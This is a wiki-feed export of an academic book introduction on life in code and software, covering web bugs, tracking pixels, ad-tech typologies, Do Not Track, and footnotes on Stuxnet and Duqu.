Rieland, R. (2012) 'So What Do We Do With All This Data?', _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sanger, D. E. (2012) Obama Order Sped Up Wave of Cyberattacks Against Iran, The New York Times, June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wauters, R (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', The Next Web, accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure', But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal, 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues: It may be that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4991</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4991"/>
		<updated>2012-06-21T10:58:06Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological, what I call ''computationality''. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful at penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has caused in print, music, film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This potential is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is, for example, 427 million Europeans (or 65 percent) use the Internet and more than 9 in 10 European Internet users reading news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand driven by the network effects of digital media, if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation&amp;amp;nbsp;are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, yet nonetheless having concrete effects. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. Although it is useful to note that theorists, such as Frabetti (2010), problematise Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, and send various information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary 